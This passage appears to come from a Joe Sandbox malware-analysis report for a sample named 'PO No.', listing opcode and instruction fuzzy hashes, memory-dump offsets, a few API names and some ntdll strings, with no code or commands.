                                                            • Instruction ID: 2f5cecdea97ffd730bb11bd11d9b6d0934ce6f58e9eb79b27ff2795f3f9254a6
                                                            • Opcode Fuzzy Hash: 30561649d344de272ee7c90e8def7e6823a2c0a9f22a18d8829d616ed0474549
                                                            • Instruction Fuzzy Hash: 40F0A4706153049FD310EF68C946A1EB7E4EF48710F44465ABCD4DB395E638EA00C756
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                            • Instruction ID: 49402a8fe0f1e4a7114fad669051e8044b9b48d7e271c73ec5a75b19e87bfed7
                                                            • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                            • Instruction Fuzzy Hash: 04F0B472610205EFE714DB21CD02F96B2EDEF98750F14C0789545D71A4FAB4DE02E654
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4f352ce1f1abfacf5cf8af90b58a8f703daeef998047158a0a4272feaea3fad3
                                                            • Instruction ID: 1866183f97d33a51cd7a5cc4625f833790b090846d3fd553a3f2bb83e79cae9e
                                                            • Opcode Fuzzy Hash: 4f352ce1f1abfacf5cf8af90b58a8f703daeef998047158a0a4272feaea3fad3
                                                            • Instruction Fuzzy Hash: 38F0B4325083446BEA217A1CEC44B5ABBA9FBD5724F894456F9C9272258A3D6D80D780
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6ac8a773137f82fa1198f51498998dcc5e05bbdb6f3a1fdd10d53cd60c7bb462
                                                            • Instruction ID: de6f8b17d7e10ee46b8672badf568a730cda4db28ef1cc3f18130f08b9c6c5b9
                                                            • Opcode Fuzzy Hash: 6ac8a773137f82fa1198f51498998dcc5e05bbdb6f3a1fdd10d53cd60c7bb462
                                                            • Instruction Fuzzy Hash: A3F04FB0A01249DFDB04EFA9C516A5EB7B5EF08300F008066B955EB395DA38EA01CB54
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3bbda1466040b972c700e13da1c17384fad1c58138cc7a8381b678043ee6604e
                                                            • Instruction ID: 85e7f2ed0a26ceabb28a819e65f39e31c2e7ebee86a9d94a51cd076b753eca19
                                                            • Opcode Fuzzy Hash: 3bbda1466040b972c700e13da1c17384fad1c58138cc7a8381b678043ee6604e
                                                            • Instruction Fuzzy Hash: 63F09A32D166E09EFF328B68C444F61B7D8AB21730F1D8DAAD49987502D764FC82E650
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 355094b70a8cb2e5cb85e9ff942d404700dfe46901dcb07a0a4b27c0212c0536
                                                            • Instruction ID: d59dc52492c0af3fed40f4f155e0b45f4620b5221352b5040083fffec05a2428
                                                            • Opcode Fuzzy Hash: 355094b70a8cb2e5cb85e9ff942d404700dfe46901dcb07a0a4b27c0212c0536
                                                            • Instruction Fuzzy Hash: F5F0E2B641968506CBB26A2CA5A02DA3B98A762210F0A10D9D8E05B209C57A8483C369
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f7f066c1e44bb01cef4a7764f4fbd47cedaf86d3873a09899c4359b9057d6ca6
                                                            • Instruction ID: 770e428df80a78426fc6d3459e92e9425aa5dffdb0879ffe2f24dffde77d1186
                                                            • Opcode Fuzzy Hash: f7f066c1e44bb01cef4a7764f4fbd47cedaf86d3873a09899c4359b9057d6ca6
                                                            • Instruction Fuzzy Hash: 4DF0E2B29116529FC3229728C349F5173D8AB81BB0F1D952DD40EC7512C364CC80FAD0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction ID: 46b83840ae0a80bb2336989e6fa8aefb7b6a21b5e581f8886649665c7d8f02b5
                                                            • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                            • Instruction Fuzzy Hash: 86E0D872300A002BD7129E59CCC5F47776FEFD2B10F08007AB5045F352C9E6DD0996A4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                            • Instruction ID: 5bd249014f6ef5393082e0361ca66678b47e76fe6f075d5ebeb301639c01f100
                                                            • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                            • Instruction Fuzzy Hash: C9F08C721002149FE3218F09D880B53B7F8EB05364F018065FA088B161D33EEC40DBA4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction ID: 4bdc4d9e6c5d696110250f70e0e2477c0ee742d12c1f51814a0b18aa21d6c140
                                                            • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                            • Instruction Fuzzy Hash: EFF0E57A204354DFEB15DF56E040AD57BA4EB51370F140055F8428B341EB31FD81EB41
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                            • Instruction ID: 5b946d0d4405a776f244aeb94b8109ab6e778a09af3879727fe6365d12ebd698
                                                            • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                            • Instruction Fuzzy Hash: E5E09233684547ABC3211E558912F6676A59BD17A0F15042DE1028B150DB78EC40F798
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                            • Instruction ID: ffe9e485e21cc9f5e4c6858f4e6aa3a6ea23a5f81484250b0510fc6b928d9bcd
                                                            • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                            • Instruction Fuzzy Hash: 42E0DF72A00110BBDB22A7998E02F9ABEBCEB80FA0F050054B602E7090E531EF00D6A0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: InitializeThunk
                                                            • String ID:
                                                            • API String ID: 2994545307-0
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction ID: f0e8614498f7304f06008e2299fca847ae4307e956d67dbc230c1bbd015dbde7
                                                            • Opcode Fuzzy Hash: 7eba0efce7d9c3098aed64107f138979cd55621edccfcfde5a0f983e140fadca
                                                            • Instruction Fuzzy Hash: 10D0A932614620AFE772AA1CFC00FC373E9AB88720F060499B008C70A2C364AC81CA84
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction ID: eabe876818e3d27b4559add11a112908f5f95e2ac1f55f83caae667c96fc1229
                                                            • Opcode Fuzzy Hash: 6e9bfb4306c29fdb1c5fce9039323a2740af754b7679fb8de59faa530781556d
                                                            • Instruction Fuzzy Hash: 75E08C31910680AFEF53DF98CA40F4ABBF5BB80B40F140448B1486B261C228A900CB40
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction ID: dfcbe58f0eb18712ce34480f807f6e2cb8ec26e21b03624dec522b24b0a4e845
                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                            • Instruction Fuzzy Hash: F7D02233626030A7DF2866606C04FA3B906DB81BA0F1A002E340AA3800C0088C42F7E0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction ID: 2a97526bb0b2f8e511baf4aa9439ae92101fd51e7ce62e38724e5a5e361784b9
                                                            • Opcode Fuzzy Hash: 950ff3e2fa24c389401d46e2ae40292d2d63fe10973766e9e1870c80e88d3a0a
                                                            • Instruction Fuzzy Hash: AFD012771E054CBBCB119F65DC02F957BA9E755BA0F444020B504875A1C63AE950D584
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bb3969a05058a54a738a0593110fd69f8e6f0f470a3def68e833e3f140ac0c79
                                                            • Instruction ID: e3a2b8c647e780e9e62035afb10debea06266dfe0a16ca6b8de468db8070eec7
                                                            • Opcode Fuzzy Hash: bb3969a05058a54a738a0593110fd69f8e6f0f470a3def68e833e3f140ac0c79
                                                            • Instruction Fuzzy Hash: F2D05E309150069BDF17CB04CA29E3E76B0FB44740F45006CE68051020DB2EDC01A640
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction ID: 44ef326954c3b5b063969b37a0762fb391d553a6c1093b8489d1ba9214be50d3
                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                            • Instruction Fuzzy Hash: B7D0C975612E80CFC72BCB0DC5A8B1633E4FB45B44F8104A0E401CBB21DA2CED40DA00
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction ID: 37afb8d523f7f49f51868aaee38373c18913503af33e54f9c0289d9090693c63
                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                            • Instruction Fuzzy Hash: D8C01232150644AFC7119A94DD01F0177A9E798B50F000021F20447571C535E910E644
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction ID: ae91bcdd82f8197a3b8db9cd9cc6746ec123cc3404f7773a13a46f401a897f6a
                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                            • Instruction Fuzzy Hash: FFD01236100248EFCB01DF41C890D9A776AFBC8710F148019FD19076118A35ED62DA50
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction ID: 8e9f1ced509e3cf558fea1542ccfca00ba49166f1563eb08de6dc0d179db40aa
                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                            • Instruction Fuzzy Hash: E1C04C75701945CFCF15DB5AD694F4577E4F744750F151890F805CB721E624ED01DA10
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f02879eb7f20e62d41e3221169fbe7591d8d3c78f89e05550845dfc9ed88ad9c
                                                            • Instruction ID: 9b8f8649a3db924f6b8d3ea17e09199096c636a71b4df2729d96d07ab8dbebb9
                                                            • Opcode Fuzzy Hash: f02879eb7f20e62d41e3221169fbe7591d8d3c78f89e05550845dfc9ed88ad9c
                                                            • Instruction Fuzzy Hash: 0490023160584022924071598884546400597E0741B55C032E0464554D8E188A576362
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b79cf2e8c67091789045449dcc79dfba580512306b16d98e1916bf6f38820354
                                                            • Instruction ID: 2e869024869be6651f0c5aa90a39611d7b687dd3eaa1c7a06fa7a2c76f18c9d3
                                                            • Opcode Fuzzy Hash: b79cf2e8c67091789045449dcc79dfba580512306b16d98e1916bf6f38820354
                                                            • Instruction Fuzzy Hash: 8A90026160154052424071598804406600597E1741395C136A0594560D8A1C8956A26A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 0466bcf5ec34a50f3aec0a6fcddd9412a6f3597b68f9063fecbe376a2735fd4b
                                                            • Instruction ID: 3aac0b813b11e9335df943a3c7845d54eed0d5302ecf3b74d04b93c389f5eaff
                                                            • Opcode Fuzzy Hash: 0466bcf5ec34a50f3aec0a6fcddd9412a6f3597b68f9063fecbe376a2735fd4b
                                                            • Instruction Fuzzy Hash: B7900225221440120245B559460450B044597D6791395C036F1456590DCA2589666322
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a7c9fd42663995ae8f3cd965fded772f70b92529857d66859b18a9c182e96afc
                                                            • Instruction ID: 456460613b3bb2aedfd12231fea61ee1a29ff800338cc53094ef2e6fbb1af41e
                                                            • Opcode Fuzzy Hash: a7c9fd42663995ae8f3cd965fded772f70b92529857d66859b18a9c182e96afc
                                                            • Instruction Fuzzy Hash: 8A900225211440130205B5594704507004687D5791355C032F1055550DDA2589626122
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b37748fc2d25be767af859454fda267c2b49b62885a9120fd1b895218cd1c7c1
                                                            • Instruction ID: 9069de3baa7e0918593b6bc3f984b8464d188f7ae3a8f9b2908832aa60ad4d7f
                                                            • Opcode Fuzzy Hash: b37748fc2d25be767af859454fda267c2b49b62885a9120fd1b895218cd1c7c1
                                                            • Instruction Fuzzy Hash: CA9002A1201580A24600B259C404B0A450587E0741B55C037E1094560DC9298952A136
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 92c76c4fa1fc6a723bbc9b0e21d11f8ac5f71afacde5d8bc598807dd78ef6a6c
                                                            • Instruction ID: 558d7888f6ce653b1db4aa3c103b50a8211f5291edf7d27b2d811d654404782a
                                                            • Opcode Fuzzy Hash: 92c76c4fa1fc6a723bbc9b0e21d11f8ac5f71afacde5d8bc598807dd78ef6a6c
                                                            • Instruction Fuzzy Hash: 3290023120144812D2807159840464A000587D1741F95C036A0065654ECE198B5A77A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 856bbc668a3ae9890000a45c4e26d144a6646eca13872a9eb9be438c0e89c7fb
                                                            • Instruction ID: 5b842cc35490e138e269170c5dda022b12574e525a6651000272496b3e3fa317
                                                            • Opcode Fuzzy Hash: 856bbc668a3ae9890000a45c4e26d144a6646eca13872a9eb9be438c0e89c7fb
                                                            • Instruction Fuzzy Hash: 1690023120548852D24071598404A46001587D0745F55C032A00A4694E9A298E56B662
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a88986dc3401ebcb7ff036102836ca27f8aee1476dc4b728d065f95187dc022
                                                            • Instruction ID: 27b9abf654a7a3e8051706e65f73f5e45711344968435e397e37f05b40f08ae8
                                                            • Opcode Fuzzy Hash: 3a88986dc3401ebcb7ff036102836ca27f8aee1476dc4b728d065f95187dc022
                                                            • Instruction Fuzzy Hash: 1B90023160544812D25071598414746000587D0741F55C032A0064654E8B598B5676A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3859e9264c707cd231e455bec487ec57c9c1946f23be3d4d198bcbc09d3a2b4d
                                                            • Instruction ID: 690853fd128e58842ec5f2173d7fa4574593483f22d7d58272b920b7d2321deb
                                                            • Opcode Fuzzy Hash: 3859e9264c707cd231e455bec487ec57c9c1946f23be3d4d198bcbc09d3a2b4d
                                                            • Instruction Fuzzy Hash: EE90023120144812D20471598804686000587D0741F55C032A6064655F9A6989927132
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bae6b31a5a166761f9d1cb9aff04472b5d22badcb041f82cb35130372287af7d
                                                            • Instruction ID: 413b2c9220d8dd908588744d6d0ab36e93ccf21d3369a0b833e277ee768c6d41
                                                            • Opcode Fuzzy Hash: bae6b31a5a166761f9d1cb9aff04472b5d22badcb041f82cb35130372287af7d
                                                            • Instruction Fuzzy Hash: D390023120144413D20071599508707000587D0741F55D432A0464558EDA5A89527122
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 76be3217032d800c35bd04c41fd73477213e51b1b5943dc4a279adf0ddc716d6
                                                            • Instruction ID: 0adf97cfe5139668185e9b5ef196f73133374d8aa91444f83cba7918d2595608
                                                            • Opcode Fuzzy Hash: 76be3217032d800c35bd04c41fd73477213e51b1b5943dc4a279adf0ddc716d6
                                                            • Instruction Fuzzy Hash: 6690022160544412D24071599418706001587D0741F55D032A0064554ECA5D8B5676A2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f44fb1329c7877886e500933c20b12853f12072d9ab184ffe2fbdb8df1c3eff7
                                                            • Instruction ID: 38ce048f38b0f5254e61dec5a95b58ce687f905a850cc1e502675042fe04a264
                                                            • Opcode Fuzzy Hash: f44fb1329c7877886e500933c20b12853f12072d9ab184ffe2fbdb8df1c3eff7
                                                            • Instruction Fuzzy Hash: 9590023120144412D20075999408646000587E0741F55D032A5064555FCA6989927132
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c7a8c8797cccdebe976e07654223b9c6843d4bf5bdf134213707e221d80d12f3
                                                            • Instruction ID: 5897352a92f0e7c6f79b2ffe3e31375f373460b6960966d43f3b15144678d777
                                                            • Opcode Fuzzy Hash: c7a8c8797cccdebe976e07654223b9c6843d4bf5bdf134213707e221d80d12f3
                                                            • Instruction Fuzzy Hash: FE90023120144852D20071598404B46000587E0741F55C037A0164654E8A19C9527522
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction ID: 95f2491547385ac238d578517c86b7712d51ff16b747792211030c427b6ae5b0
                                                            • Opcode Fuzzy Hash: c7db5358ecc2dc51fff9bc9cb5a829b39f61e3c90ad9b4579aeacee396ac6e74
                                                            • Instruction Fuzzy Hash: C85127B2E04216BFDB61DB98C89097EF7B9BB18300B14826AE495D3381D734DE40B7E1
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2418789448.0000000000F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F60000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_f60000_PO No.jbxd
                                                            Similarity
                                                            • API ID: ___swprintf_l
                                                            • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                            • API String ID: 48624451-2108815105
                                                            • Opcode ID: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction ID: 1238b3d0e57a0b1036051833e31c8c37207b752d7008bb149943240196151eaf
                                                            • Opcode Fuzzy Hash: 9bd67a279ba38630814d03e81cbc05ec09a846a4499d814d58bec043f3fc2335
                                                            • Instruction Fuzzy Hash: 9451F6B5B00645AFCB60DE9CD8D097EB7F8EF44200B4484A9F4D6D7642DAB4DA4087A0
                                                            Strings
                                                            • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01004655
                                                            • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01004742
                                                            • Execute=1, xrefs: 01004713
